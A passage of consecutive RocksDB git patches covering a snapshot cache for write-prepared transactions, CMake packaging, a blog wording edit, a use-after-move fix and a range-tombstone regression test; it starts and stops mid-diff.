+ // Items could have moved from the snapshots_ to snapshot_cache_ before + // accquiring the lock. To make sure that we do not miss a valid snapshot, + // read snapshot_cache_ again while holding the lock. + for (size_t i = 0; i < SNAPSHOT_CACHE_SIZE; i++) { + snapshot_seq = snapshot_cache_[i].load(std::memory_order_acquire); + if (!MaybeUpdateOldCommitMap(evicted.prep_seq, evicted.commit_seq, + snapshot_seq, next_is_larger)) { break; } - // then snapshot_seq < evicted.commit_seq - if (evicted.prep_seq <= snapshot_seq) { // overlapping range - WriteLock wl(&old_commit_map_mutex_); - old_commit_map_empty_.store(false, std::memory_order_release); - old_commit_map_[evicted.prep_seq] = evicted.commit_seq; + } + for (auto snapshot_seq_2 : snapshots_) { + if (!MaybeUpdateOldCommitMap(evicted.prep_seq, evicted.commit_seq, + snapshot_seq_2, next_is_larger)) { + break; } } } @@ -691,7 +776,31 @@ bool WritePreparedTxnDB::ExchangeCommitEntry(uint64_t indexed_seq, } // 10m entry, 80MB size -uint64_t WritePreparedTxnDB::DEF_COMMIT_CACHE_SIZE = - static_cast(1 << 21); +size_t WritePreparedTxnDB::DEF_COMMIT_CACHE_SIZE = static_cast(1 << 21); +size_t WritePreparedTxnDB::DEF_SNAPSHOT_CACHE_SIZE = + static_cast(1 << 7); + +bool WritePreparedTxnDB::MaybeUpdateOldCommitMap( + const uint64_t& prep_seq, const uint64_t& commit_seq, + const uint64_t& snapshot_seq, const bool next_is_larger = true) { + // If we do not store an entry in old_commit_map we assume it is committed in + // all snapshots. if commit_seq <= snapshot_seq, it is considered already in + // the snapshot so we need not to keep the entry around for this snapshot. + if (commit_seq <= snapshot_seq) { + // continue the search if the next snapshot could be smaller than commit_seq + return !next_is_larger; + } + // then snapshot_seq < commit_seq + if (prep_seq <= snapshot_seq) { // overlapping range + WriteLock wl(&old_commit_map_mutex_); + old_commit_map_empty_.store(false, std::memory_order_release); + old_commit_map_[prep_seq] = commit_seq; + // Storing once is enough. No need to check it for other snapshots. + return false; + } + // continue the search if the next snapshot could be larger than prep_seq + return next_is_larger; +} + } // namespace rocksdb #endif // ROCKSDB_LITE diff --git a/utilities/transactions/pessimistic_transaction_db.h b/utilities/transactions/pessimistic_transaction_db.h index 489da30bfcb..e3eec6b602a 100644 --- a/utilities/transactions/pessimistic_transaction_db.h +++ b/utilities/transactions/pessimistic_transaction_db.h @@ -107,6 +107,8 @@ class PessimisticTransactionDB : public TransactionDB { struct CommitEntry { uint64_t prep_seq; uint64_t commit_seq; + CommitEntry() : prep_seq(0), commit_seq(0) {} + CommitEntry(uint64_t ps, uint64_t cs) : prep_seq(ps), commit_seq(cs) {} }; protected: @@ -114,8 +116,10 @@ class PessimisticTransactionDB : public TransactionDB { Transaction* txn, const WriteOptions& write_options, const TransactionOptions& txn_options = TransactionOptions()); DBImpl* db_impl_; + std::shared_ptr info_log_; private: + friend class WritePreparedTxnDB; const TransactionDBOptions txn_db_options_; TransactionLockMgr lock_mgr_; @@ -162,6 +166,7 @@ class WritePreparedTxnDB : public PessimisticTransactionDB { explicit WritePreparedTxnDB(DB* db, const TransactionDBOptions& txn_db_options) : PessimisticTransactionDB(db, txn_db_options), + SNAPSHOT_CACHE_SIZE(DEF_SNAPSHOT_CACHE_SIZE), COMMIT_CACHE_SIZE(DEF_COMMIT_CACHE_SIZE) { init(txn_db_options); } @@ -169,6 +174,7 @@ class WritePreparedTxnDB : public PessimisticTransactionDB { explicit WritePreparedTxnDB(StackableDB* db, const TransactionDBOptions& txn_db_options) : PessimisticTransactionDB(db, txn_db_options), + SNAPSHOT_CACHE_SIZE(DEF_SNAPSHOT_CACHE_SIZE), COMMIT_CACHE_SIZE(DEF_COMMIT_CACHE_SIZE) { init(txn_db_options); } @@ -192,6 +198,8 @@ class WritePreparedTxnDB : public PessimisticTransactionDB { friend class WritePreparedTransactionTest_IsInSnapshotTest_Test; void init(const TransactionDBOptions& /* unused */) { + snapshot_cache_ = unique_ptr[]>( + new std::atomic[SNAPSHOT_CACHE_SIZE] {}); commit_cache_ = unique_ptr(new CommitEntry[COMMIT_CACHE_SIZE]{}); } @@ -199,8 +207,10 @@ class WritePreparedTxnDB : public PessimisticTransactionDB { // A heap with the amortized O(1) complexity for erase. It uses one extra heap // to keep track of erased entries that are not yet on top of the main heap. class PreparedHeap { - std::priority_queue heap_; - std::priority_queue erased_heap_; + std::priority_queue, std::greater> + heap_; + std::priority_queue, std::greater> + erased_heap_; public: bool empty() { return heap_.empty(); } @@ -216,7 +226,7 @@ class WritePreparedTxnDB : public PessimisticTransactionDB { } void erase(uint64_t seq) { if (!heap_.empty()) { - if (heap_.top() < seq) { + if (seq < heap_.top()) { // Already popped, ignore it. } else if (heap_.top() == seq) { heap_.pop(); @@ -242,15 +252,42 @@ class WritePreparedTxnDB : public PessimisticTransactionDB { bool ExchangeCommitEntry(uint64_t indexed_seq, CommitEntry& expected_entry, CommitEntry new_entry); + // Add a new entry to old_commit_map_ if prep_seq <= snapshot_seq < + // commit_seq. Return false if checking the next snapshot(s) is not needed. + // This is the case if the entry already added to old_commit_map_ or none of + // the next snapshots could satisfy the condition. next_is_larger: the next + // snapshot will be a larger value + bool MaybeUpdateOldCommitMap(const uint64_t& prep_seq, + const uint64_t& commit_seq, + const uint64_t& snapshot_seq, + const bool next_is_larger); + // The list of live snapshots at the last time that max_evicted_seq_ advanced. - // The list sorted in ascending order. Thread-safety is provided with - // snapshots_mutex_. + // The list stored into two data structures: in snapshot_cache_ that is + // efficient for concurrent reads, and in snapshots_ if the data does not fit + // into snapshot_cache_. The total number of snapshots in the two lists + std::atomic snapshots_total_ = {}; + // The list sorted in ascending order. Thread-safety for writes is provided + // with snapshots_mutex_ and concurrent reads are safe due to std::atomic for + // each entry. In x86_64 architecture such reads are compiled to simple read + // instructions. 128 entries + // TODO(myabandeh): avoid non-const static variables + static size_t DEF_SNAPSHOT_CACHE_SIZE; + const size_t SNAPSHOT_CACHE_SIZE; + unique_ptr[]> snapshot_cache_; + // 2nd list for storing snapshots. The list sorted in ascending order. + // Thread-safety is provided with snapshots_mutex_. std::vector snapshots_; + // The version of the latest list of snapshots. This can be used to avoid + // rewrittiing a list that is concurrently updated with a more recent version. + SequenceNumber snapshots_version_ = 0; + // A heap of prepared transactions. Thread-safety is provided with // prepared_mutex_. PreparedHeap prepared_txns_; - static uint64_t DEF_COMMIT_CACHE_SIZE; - const uint64_t COMMIT_CACHE_SIZE; + // TODO(myabandeh): avoid non-const static variables + static size_t DEF_COMMIT_CACHE_SIZE; + const size_t COMMIT_CACHE_SIZE; // commit_cache_ must be initialized to zero to tell apart an empty index from // a filled one. Thread-safety is provided with commit_cache_mutex_. unique_ptr commit_cache_; diff --git a/utilities/transactions/transaction_test.cc b/utilities/transactions/transaction_test.cc index 2e8c87f49ac..eac8e563d7b 100644 --- a/utilities/transactions/transaction_test.cc +++ b/utilities/transactions/transaction_test.cc @@ -5,6 +5,11 @@ #ifndef ROCKSDB_LITE +#ifndef __STDC_FORMAT_MACROS +#define __STDC_FORMAT_MACROS +#endif + +#include #include #include #include @@ -4734,8 +4739,10 @@ TEST_P(WritePreparedTransactionTest, IsInSnapshotTest) { WriteOptions wo; // Use small commit cache to trigger lots of eviction and fast advance of // max_evicted_seq_ - WritePreparedTxnDB::DEF_COMMIT_CACHE_SIZE = - 8; // will take effect after ReOpen + // will take effect after ReOpen + WritePreparedTxnDB::DEF_COMMIT_CACHE_SIZE = 8; + // Same for snapshot cache size + WritePreparedTxnDB::DEF_SNAPSHOT_CACHE_SIZE = 5; // Take some preliminary snapshots first. This is to stress the data structure // that holds the old snapshots as it will be designed to be efficient when @@ -4755,6 +4762,7 @@ TEST_P(WritePreparedTransactionTest, IsInSnapshotTest) { uint64_t cur_txn = 0; // Number of snapshots taken so far int num_snapshots = 0; + std::vector to_be_released; // Number of gaps applied so far int gap_cnt = 0; // The final snapshot that we will inspect @@ -4800,14 +4808,17 @@ TEST_P(WritePreparedTransactionTest, IsInSnapshotTest) { if (num_snapshots < max_snapshots - 1) { // Take preliminary snapshots - db->GetSnapshot(); + auto tmp_snapshot = db->GetSnapshot(); + to_be_released.push_back(tmp_snapshot); num_snapshots++; } else if (gap_cnt < max_gap) { // Wait for some gap before taking the final snapshot gap_cnt++; } else if (!snapshot) { // Take the final snapshot if it is not already taken - snapshot = db->GetSnapshot()->GetSequenceNumber(); + auto tmp_snapshot = db->GetSnapshot(); + to_be_released.push_back(tmp_snapshot); + snapshot = tmp_snapshot->GetSequenceNumber(); // We increase the db seq artificailly by a dummy Put. Check that this // technique is effective and db seq is that same as ours. ASSERT_EQ(snapshot, seq); @@ -4823,11 +4834,12 @@ TEST_P(WritePreparedTransactionTest, IsInSnapshotTest) { (committed_before.find(s) != committed_before.end()); bool is_in_snapshot = wp_db->IsInSnapshot(s, snapshot); if (was_committed != is_in_snapshot) { - printf( - "max_snapshots %d max_gap %d seq %lu max %lu snapshot %lu " - "gap_cnt %d num_snapshots %d\n", - max_snapshots, max_gap, seq, wp_db->max_evicted_seq_.load(), - snapshot, gap_cnt, num_snapshots); + printf("max_snapshots %d max_gap %d seq %" PRIu64 " max %" PRIu64 + " snapshot %" PRIu64 + " gap_cnt %d num_snapshots %d s %" PRIu64 "\n", + max_snapshots, max_gap, seq, + wp_db->max_evicted_seq_.load(), snapshot, gap_cnt, + num_snapshots, s); } ASSERT_EQ(was_committed, is_in_snapshot); found_committed = found_committed || is_in_snapshot; @@ -4846,6 +4858,9 @@ TEST_P(WritePreparedTransactionTest, IsInSnapshotTest) { } ASSERT_TRUE(wp_db->delayed_prepared_.empty()); ASSERT_TRUE(wp_db->prepared_txns_.empty()); + for (auto s : to_be_released) { + db->ReleaseSnapshot(s); + } } } } From 2972a702a418139edf56c71ecafcef8e176552c5 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Sun, 27 Aug 2017 07:27:22 -0700 Subject: [PATCH 156/205] Minor updates to FlushWAL blog Summary: Closes https://github.com/facebook/rocksdb/pull/2792 Differential Revision: D5715365 Pulled By: maysamyabandeh fbshipit-source-id: 0837b93ea1d4b0a08dfb3cd0d1feb6e098ef26a4 --- docs/_posts/2017-08-25-flushwal.markdown | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/docs/_posts/2017-08-25-flushwal.markdown b/docs/_posts/2017-08-25-flushwal.markdown index 01f878e87b7..2dc5626ad48 100644 --- a/docs/_posts/2017-08-25-flushwal.markdown +++ b/docs/_posts/2017-08-25-flushwal.markdown @@ -5,7 +5,7 @@ author: maysamyabandeh category: blog --- -When `DB::Put` is called, the data is written to both memtable (to be flushed to SST files later) and the WAL (write-ahead log) if it is enabled. In the case of a crash, RocksDB can recover as much as the memtable state that is reflected into the WAL. By default RocksDB automatically flushes the WAL from the application memory to the OS buffer after each `::Put`. It however can be configured to perform the flush manually after an explicit call to ::FlushWAL. Not doing fwrite syscall after each ::Put offers a tradeoff between reliability and write latency for the general case. As we explain below, some applications such as MyRocks benefit from this API to gain higher write throughput with however no compromise in reliability. +When `DB::Put` is called, the data is written to both memtable (to be flushed to SST files later) and the WAL (write-ahead log) if it is enabled. In the case of a crash, RocksDB can recover as much as the memtable state that is reflected into the WAL. By default RocksDB automatically flushes the WAL from the application memory to the OS buffer after each `::Put`. It however can be configured to perform the flush manually after an explicit call to `::FlushWAL`. Not doing fwrite syscall after each `::Put` offers a tradeoff between reliability and write latency for the general case. As we explain below, some applications such as MyRocks benefit from this API to gain higher write throughput with however no compromise in reliability. ### How much is the gain? @@ -13,7 +13,7 @@ Using `::FlushWAL` API along with setting `DBOptions.concurrent_prepare`, MyRock ### Write, Flush, and Sync -The write to the WAL is first written to the application memory buffer. The buffer in the next step is "flushed" to OS buffer by calling fwrite syscall. The OS buffer is later "synced" to the persistent storage. The data in the OS buffer, although not persisted yet, will survive the application crash. By default, the flush occurs automatically upon each call to DB::Put or DB::Write. The user can additionally request sync after each write by setting WriteOptions::sync. +The write to the WAL is first written to the application memory buffer. The buffer in the next step is "flushed" to OS buffer by calling fwrite syscall. The OS buffer is later "synced" to the persistent storage. The data in the OS buffer, although not persisted yet, will survive the application crash. By default, the flush occurs automatically upon each call to `DB::Put` or `DB::Write`. The user can additionally request sync after each write by setting `WriteOptions::sync`. ### FlushWAL API @@ -23,4 +23,4 @@ The user can turn off the automatic flush of the WAL by setting `DBOptions::manu Some applications that use RocksDB, already have other machinsims in place to provide reliability. MySQL for example uses 2PC (two-phase commit) to write to both binlog as well as the storage engine such as InnoDB and MyRocks. The group commit logic in MySQL allows the 1st phase (Prepare) to be run in parallel but after a commit group is formed performs the 2nd phase (Commit) in a serial manner. This makes low commit latency in the storage engine essential for acheiving high throughput. The commit in MyRocks includes writing to the RocksDB WAL, which as explaiend above, by default incures the latency of flushing the WAL new appends to the OS buffer. -Since a storage engine commit is not visible to the users until the group commit finishes, and also because binlog helps in recovering from some failure scenarios, MySQL can provide reliability without however needing a storage WAL flush after each individual commit. MyRocks benefits from this property, disables automatic WAL flush in RocksDB, and manually calls `::FlushWAL` when requested by MySQL. +Since binlog helps in recovering from some failure scenarios, MySQL can provide reliability without however needing a storage WAL flush after each individual commit. MyRocks benefits from this property, disables automatic WAL flush in RocksDB, and manually calls `::FlushWAL` when requested by MySQL. From 5444345588adc5452be8864d3a57ee229afe733b Mon Sep 17 00:00:00 2001 From: benoitc Date: Mon, 28 Aug 2017 16:27:20 -0700 Subject: [PATCH 157/205] add Erlang to the list of language bindings Summary: small edit of the language binding file to add the Erlang binding. Closes https://github.com/facebook/rocksdb/pull/2797 Differential Revision: D5722235 Pulled By: sagar0 fbshipit-source-id: 8ecd74996dad4cac19666783256cfa4d9ce09160 --- LANGUAGE-BINDINGS.md | 1 + 1 file changed, 1 insertion(+) diff --git a/LANGUAGE-BINDINGS.md b/LANGUAGE-BINDINGS.md index 8084b6c3019..ffeed98f28d 100644 --- a/LANGUAGE-BINDINGS.md +++ b/LANGUAGE-BINDINGS.md @@ -13,3 +13,4 @@ This is the list of all known third-party language bindings for RocksDB. If some * https://github.com/spacejam/rust-rocksdb * https://github.com/bh1xuw/rust-rocks * D programming language - https://github.com/b1naryth1ef/rocksdb +* Erlang - https://gitlab.com/barrel-db/erlang-rocksdb From c21ea8f7a6ee8fed5dde323528c1e260d0d47567 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Pawe=C5=82=20Bylica?= Date: Mon, 28 Aug 2017 16:56:49 -0700 Subject: [PATCH 158/205] CMake: Add support for CMake packages Summary: Adds support for CMake packages: https://cmake.org/cmake/help/v3.9/manual/cmake-packages.7.html#creating-packages. This allow using RocksDB by other CMake projects this way: ``` cmake_minimum_required(VERSION 3.5) project(rdbt) find_package(RocksDB CONFIG) add_executable(rdbt test.cpp) target_link_libraries(rdbt PRIVATE RocksDB::rocksdb) ``` Closes https://github.com/facebook/rocksdb/pull/2773 Differential Revision: D5722587 Pulled By: sagar0 fbshipit-source-id: 0d90dc4a77b42a617cdbe1348a370e719c282b87 --- CMakeLists.txt | 51 +++++++++++++++++++++++++++++++++--- cmake/RocksDBConfig.cmake.in | 3 +++ 2 files changed, 51 insertions(+), 3 deletions(-) create mode 100644 cmake/RocksDBConfig.cmake.in diff --git a/CMakeLists.txt b/CMakeLists.txt index 715147291fc..b04f7ae25f8 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -648,9 +648,54 @@ if(NOT WIN32 OR ROCKSDB_INSTALL_ON_WINDOWS) endif() include(GNUInstallDirs) - install(TARGETS ${ROCKSDB_STATIC_LIB} COMPONENT devel ARCHIVE DESTINATION ${CMAKE_INSTALL_LIBDIR}) - install(TARGETS ${ROCKSDB_SHARED_LIB} COMPONENT runtime DESTINATION ${CMAKE_INSTALL_LIBDIR}) - install(DIRECTORY include/rocksdb COMPONENT devel DESTINATION ${CMAKE_INSTALL_INCLUDEDIR}) + include(CMakePackageConfigHelpers) + + set(package_config_destination ${CMAKE_INSTALL_LIBDIR}/cmake/rocksdb) + + configure_package_config_file( + ${CMAKE_SOURCE_DIR}/cmake/RocksDBConfig.cmake.in RocksDBConfig.cmake + INSTALL_DESTINATION ${package_config_destination} + ) + + write_basic_package_version_file( + RocksDBConfigVersion.cmake + VERSION ${ROCKSDB_VERSION} + COMPATIBILITY SameMajorVersion + ) + + install(DIRECTORY include/rocksdb COMPONENT devel DESTINATION "${CMAKE_INSTALL_INCLUDEDIR}") + + install( + TARGETS ${ROCKSDB_STATIC_LIB} + EXPORT RocksDBTargets + COMPONENT devel + ARCHIVE DESTINATION "${CMAKE_INSTALL_LIBDIR}" + INCLUDES DESTINATION "${CMAKE_INSTALL_INCLUDEDIR}" + ) + + install( + TARGETS ${ROCKSDB_SHARED_LIB} + EXPORT RocksDBTargets + COMPONENT runtime + RUNTIME DESTINATION "${CMAKE_INSTALL_BINDIR}" + LIBRARY DESTINATION "${CMAKE_INSTALL_LIBDIR}" + INCLUDES DESTINATION "${CMAKE_INSTALL_INCLUDEDIR}" + ) + + install( + EXPORT RocksDBTargets + COMPONENT devel + DESTINATION ${package_config_destination} + NAMESPACE RocksDB:: + ) + + install( + FILES + ${CMAKE_CURRENT_BINARY_DIR}/RocksDBConfig.cmake + ${CMAKE_CURRENT_BINARY_DIR}/RocksDBConfigVersion.cmake + COMPONENT devel + DESTINATION ${package_config_destination} + ) endif() option(WITH_TESTS "build with tests" ON) diff --git a/cmake/RocksDBConfig.cmake.in b/cmake/RocksDBConfig.cmake.in new file mode 100644 index 00000000000..b3cb2b27adf --- /dev/null +++ b/cmake/RocksDBConfig.cmake.in @@ -0,0 +1,3 @@ +@PACKAGE_INIT@ +include("${CMAKE_CURRENT_LIST_DIR}/RocksDBTargets.cmake") +check_required_components(RocksDB) From c41744270ac0e5ee649181211d8b09facfa45255 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Pawe=C5=82=20Bylica?= Date: Mon, 28 Aug 2017 18:36:35 -0700 Subject: [PATCH 159/205] CMake: Fix formatting Summary: This if followup of #2195. Closes https://github.com/facebook/rocksdb/pull/2772 Differential Revision: D5722495 Pulled By: sagar0 fbshipit-source-id: 169d0cef53b03056ea7b9454954a35c707a67d52 --- CMakeLists.txt | 148 ++++++++++++++++++++++++------------------------- 1 file changed, 74 insertions(+), 74 deletions(-) diff --git a/CMakeLists.txt b/CMakeLists.txt index b04f7ae25f8..31ab5abb8f5 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -700,7 +700,7 @@ endif() option(WITH_TESTS "build with tests" ON) if(WITH_TESTS) -set(TESTS + set(TESTS cache/cache_test.cc cache/lru_cache_test.cc db/column_family_test.cc @@ -832,85 +832,85 @@ set(TESTS utilities/transactions/transaction_test.cc utilities/ttl/ttl_test.cc utilities/write_batch_with_index/write_batch_with_index_test.cc -) -if(WITH_LIBRADOS) - list(APPEND TESTS utilities/env_librados_test.cc) -endif() - -set(BENCHMARKS - cache/cache_bench.cc - memtable/memtablerep_bench.cc - tools/db_bench.cc - table/table_reader_bench.cc - utilities/column_aware_encoding_exp.cc - utilities/persistent_cache/hash_table_bench.cc) -add_library(testharness OBJECT util/testharness.cc) -foreach(sourcefile ${BENCHMARKS}) - get_filename_component(exename ${sourcefile} NAME_WE) - add_executable(${exename}${ARTIFACT_SUFFIX} ${sourcefile} - $) - target_link_libraries(${exename}${ARTIFACT_SUFFIX} gtest ${LIBS}) -endforeach(sourcefile ${BENCHMARKS}) - -# For test util library that is build only in DEBUG mode -# and linked to tests. Add test only code that is not #ifdefed for Release here. -set(TESTUTIL_SOURCE - db/db_test_util.cc - monitoring/thread_status_updater_debug.cc - table/mock_table.cc - util/fault_injection_test_env.cc - utilities/cassandra/test_utils.cc -) -# test utilities are only build in debug -enable_testing() -add_custom_target(check COMMAND ${CMAKE_CTEST_COMMAND}) -set(TESTUTILLIB testutillib${ARTIFACT_SUFFIX}) -add_library(${TESTUTILLIB} STATIC ${TESTUTIL_SOURCE}) -if(MSVC) - set_target_properties(${TESTUTILLIB} PROPERTIES COMPILE_FLAGS "/Fd${CMAKE_CFG_INTDIR}/testutillib${ARTIFACT_SUFFIX}.pdb") -endif() -set_target_properties(${TESTUTILLIB} - PROPERTIES EXCLUDE_FROM_DEFAULT_BUILD_RELEASE 1 - EXCLUDE_FROM_DEFAULT_BUILD_MINRELEASE 1 - EXCLUDE_FROM_DEFAULT_BUILD_RELWITHDEBINFO 1 - ) - -# Tests are excluded from Release builds -set(TEST_EXES ${TESTS}) + ) + if(WITH_LIBRADOS) + list(APPEND TESTS utilities/env_librados_test.cc) + endif() -foreach(sourcefile ${TEST_EXES}) + set(BENCHMARKS + cache/cache_bench.cc + memtable/memtablerep_bench.cc + tools/db_bench.cc + table/table_reader_bench.cc + utilities/column_aware_encoding_exp.cc + utilities/persistent_cache/hash_table_bench.cc) + add_library(testharness OBJECT util/testharness.cc) + foreach(sourcefile ${BENCHMARKS}) get_filename_component(exename ${sourcefile} NAME_WE) add_executable(${exename}${ARTIFACT_SUFFIX} ${sourcefile} $) - set_target_properties(${exename}${ARTIFACT_SUFFIX} - PROPERTIES EXCLUDE_FROM_DEFAULT_BUILD_RELEASE 1 - EXCLUDE_FROM_DEFAULT_BUILD_MINRELEASE 1 - EXCLUDE_FROM_DEFAULT_BUILD_RELWITHDEBINFO 1 - ) - target_link_libraries(${exename}${ARTIFACT_SUFFIX} testutillib${ARTIFACT_SUFFIX} gtest ${LIBS}) - if(NOT "${exename}" MATCHES "db_sanity_test") + target_link_libraries(${exename}${ARTIFACT_SUFFIX} gtest ${LIBS}) + endforeach(sourcefile ${BENCHMARKS}) + + # For test util library that is build only in DEBUG mode + # and linked to tests. Add test only code that is not #ifdefed for Release here. + set(TESTUTIL_SOURCE + db/db_test_util.cc + monitoring/thread_status_updater_debug.cc + table/mock_table.cc + util/fault_injection_test_env.cc + utilities/cassandra/test_utils.cc + ) + # test utilities are only build in debug + enable_testing() + add_custom_target(check COMMAND ${CMAKE_CTEST_COMMAND}) + set(TESTUTILLIB testutillib${ARTIFACT_SUFFIX}) + add_library(${TESTUTILLIB} STATIC ${TESTUTIL_SOURCE}) + if(MSVC) + set_target_properties(${TESTUTILLIB} PROPERTIES COMPILE_FLAGS "/Fd${CMAKE_CFG_INTDIR}/testutillib${ARTIFACT_SUFFIX}.pdb") + endif() + set_target_properties(${TESTUTILLIB} + PROPERTIES EXCLUDE_FROM_DEFAULT_BUILD_RELEASE 1 + EXCLUDE_FROM_DEFAULT_BUILD_MINRELEASE 1 + EXCLUDE_FROM_DEFAULT_BUILD_RELWITHDEBINFO 1 + ) + + # Tests are excluded from Release builds + set(TEST_EXES ${TESTS}) + + foreach(sourcefile ${TEST_EXES}) + get_filename_component(exename ${sourcefile} NAME_WE) + add_executable(${exename}${ARTIFACT_SUFFIX} ${sourcefile} + $) + set_target_properties(${exename}${ARTIFACT_SUFFIX} + PROPERTIES EXCLUDE_FROM_DEFAULT_BUILD_RELEASE 1 + EXCLUDE_FROM_DEFAULT_BUILD_MINRELEASE 1 + EXCLUDE_FROM_DEFAULT_BUILD_RELWITHDEBINFO 1 + ) + target_link_libraries(${exename}${ARTIFACT_SUFFIX} testutillib${ARTIFACT_SUFFIX} gtest ${LIBS}) + if(NOT "${exename}" MATCHES "db_sanity_test") + add_test(NAME ${exename} COMMAND ${exename}${ARTIFACT_SUFFIX}) + add_dependencies(check ${exename}${ARTIFACT_SUFFIX}) + endif() + endforeach(sourcefile ${TEST_EXES}) + + # C executables must link to a shared object + set(C_TESTS db/c_test.c) + set(C_TEST_EXES ${C_TESTS}) + + foreach(sourcefile ${C_TEST_EXES}) + string(REPLACE ".c" "" exename ${sourcefile}) + string(REGEX REPLACE "^((.+)/)+" "" exename ${exename}) + add_executable(${exename}${ARTIFACT_SUFFIX} ${sourcefile}) + set_target_properties(${exename}${ARTIFACT_SUFFIX} + PROPERTIES EXCLUDE_FROM_DEFAULT_BUILD_RELEASE 1 + EXCLUDE_FROM_DEFAULT_BUILD_MINRELEASE 1 + EXCLUDE_FROM_DEFAULT_BUILD_RELWITHDEBINFO 1 + ) + target_link_libraries(${exename}${ARTIFACT_SUFFIX} ${ROCKSDB_IMPORT_LIB} testutillib${ARTIFACT_SUFFIX}) add_test(NAME ${exename} COMMAND ${exename}${ARTIFACT_SUFFIX}) add_dependencies(check ${exename}${ARTIFACT_SUFFIX}) - endif() -endforeach(sourcefile ${TEST_EXES}) - -# C executables must link to a shared object -set(C_TESTS db/c_test.c) -set(C_TEST_EXES ${C_TESTS}) - -foreach(sourcefile ${C_TEST_EXES}) - string(REPLACE ".c" "" exename ${sourcefile}) - string(REGEX REPLACE "^((.+)/)+" "" exename ${exename}) - add_executable(${exename}${ARTIFACT_SUFFIX} ${sourcefile}) - set_target_properties(${exename}${ARTIFACT_SUFFIX} - PROPERTIES EXCLUDE_FROM_DEFAULT_BUILD_RELEASE 1 - EXCLUDE_FROM_DEFAULT_BUILD_MINRELEASE 1 - EXCLUDE_FROM_DEFAULT_BUILD_RELWITHDEBINFO 1 - ) - target_link_libraries(${exename}${ARTIFACT_SUFFIX} ${ROCKSDB_IMPORT_LIB} testutillib${ARTIFACT_SUFFIX}) - add_test(NAME ${exename} COMMAND ${exename}${ARTIFACT_SUFFIX}) - add_dependencies(check ${exename}${ARTIFACT_SUFFIX}) -endforeach(sourcefile ${C_TEST_EXES}) + endforeach(sourcefile ${C_TEST_EXES}) endif() option(WITH_TOOLS "build with tools" ON) From b767972313677971bd96b20a72488ec9f2142747 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Tue, 29 Aug 2017 11:57:59 -0700 Subject: [PATCH 160/205] avoid use-after-move error Summary: * db/range_del_aggregator.cc (AddTombstone): Avoid a potential use-after-move bug. The original code would both use and move `tombstone` in a context where the order of those operations is not specified. The fix is to perform the use on a new, preceding statement. Author: meyering Closes https://github.com/facebook/rocksdb/pull/2796 Differential Revision: D5721163 Pulled By: ajkr fbshipit-source-id: a1d328d6a77a17c6425e8069860a202e615e2f48 --- db/range_del_aggregator.cc | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/db/range_del_aggregator.cc b/db/range_del_aggregator.cc index 0aa5d22cbcb..cb51ea7f876 100644 --- a/db/range_del_aggregator.cc +++ b/db/range_del_aggregator.cc @@ -357,7 +357,8 @@ Status RangeDelAggregator::AddTombstone(RangeTombstone tombstone) { ++new_range_dels_iter; } } else { - tombstone_map.emplace(tombstone.start_key_, std::move(tombstone)); + auto start_key = tombstone.start_key_; + tombstone_map.emplace(start_key, std::move(tombstone)); } return Status::OK(); } From 0980dc6c9abe263531cb313af56c5018b8f4b331 Mon Sep 17 00:00:00 2001 From: Huachao Huang Date: Tue, 29 Aug 2017 18:27:21 -0700 Subject: [PATCH 161/205] Fix wrong smallest key of delete range tombstones Summary: Since tombstones are not stored in order, we may get a wrong smallest key if we only consider the first added tombstone. Check https://github.com/facebook/rocksdb/issues/2752 for more details. Closes https://github.com/facebook/rocksdb/pull/2799 Differential Revision: D5728217 Pulled By: ajkr fbshipit-source-id: 4a53edb0ca80d2a9fcf10749e52d47d57d6417d3 --- db/db_range_del_test.cc | 34 ++++++++++++++++++++++++++++++++++ db/range_del_aggregator.cc | 4 ++-- 2 files changed, 36 insertions(+), 2 deletions(-) diff --git a/db/db_range_del_test.cc b/db/db_range_del_test.cc index dbc27e870c1..982cbb85ab2 100644 --- a/db/db_range_del_test.cc +++ b/db/db_range_del_test.cc @@ -962,6 +962,40 @@ TEST_F(DBRangeDelTest, CompactionTreatsSplitInputLevelDeletionAtomically) { } } +TEST_F(DBRangeDelTest, UnorderedTombstones) { + // Regression test for #2752. Range delete tombstones between + // different snapshot stripes are not stored in order, so the first + // tombstone of each snapshot stripe should be checked as a smallest + // candidate. + Options options = CurrentOptions(); + DestroyAndReopen(options); + + auto cf = db_->DefaultColumnFamily(); + + ASSERT_OK(db_->Put(WriteOptions(), cf, "a", "a")); + ASSERT_OK(db_->Flush(FlushOptions(), cf)); + ASSERT_EQ(1, NumTableFilesAtLevel(0)); + ASSERT_OK(dbfull()->TEST_CompactRange(0, nullptr, nullptr)); + ASSERT_EQ(1, NumTableFilesAtLevel(1)); + + ASSERT_OK(db_->DeleteRange(WriteOptions(), cf, "b", "c")); + // Hold a snapshot to separate these two delete ranges. + auto snapshot = db_->GetSnapshot(); + ASSERT_OK(db_->DeleteRange(WriteOptions(), cf, "a", "b")); + ASSERT_OK(db_->Flush(FlushOptions(), cf)); + db_->ReleaseSnapshot(snapshot); + + std::vector> files; + dbfull()->TEST_GetFilesMetaData(cf, &files); + ASSERT_EQ(1, files[0].size()); + ASSERT_EQ("a", files[0][0].smallest.user_key()); + ASSERT_EQ("c", files[0][0].largest.user_key()); + + std::string v; + auto s = db_->Get(ReadOptions(), "a", &v); + ASSERT_TRUE(s.IsNotFound()); +} + #endif // ROCKSDB_LITE } // namespace rocksdb diff --git a/db/range_del_aggregator.cc b/db/range_del_aggregator.cc index cb51ea7f876..c83f5a88cd8 100644 --- a/db/range_del_aggregator.cc +++ b/db/range_del_aggregator.cc @@ -413,8 +413,8 @@ void RangeDelAggregator::AddToBuilder( // Note the order in which tombstones are stored is insignificant since we // insert them into a std::map on the read path. - bool first_added = false; while (stripe_map_iter != rep_->stripe_map_.end()) { + bool first_added = false; for (auto tombstone_map_iter = stripe_map_iter->second.raw_map.begin(); tombstone_map_iter != stripe_map_iter->second.raw_map.end(); ++tombstone_map_iter) { @@ -453,7 +453,7 @@ void RangeDelAggregator::AddToBuilder( builder->Add(ikey_and_end_key.first.Encode(), ikey_and_end_key.second); if (!first_added) { first_added = true; - InternalKey smallest_candidate = std::move(ikey_and_end_key.first);; + InternalKey smallest_candidate = std::move(ikey_and_end_key.first); if (lower_bound != 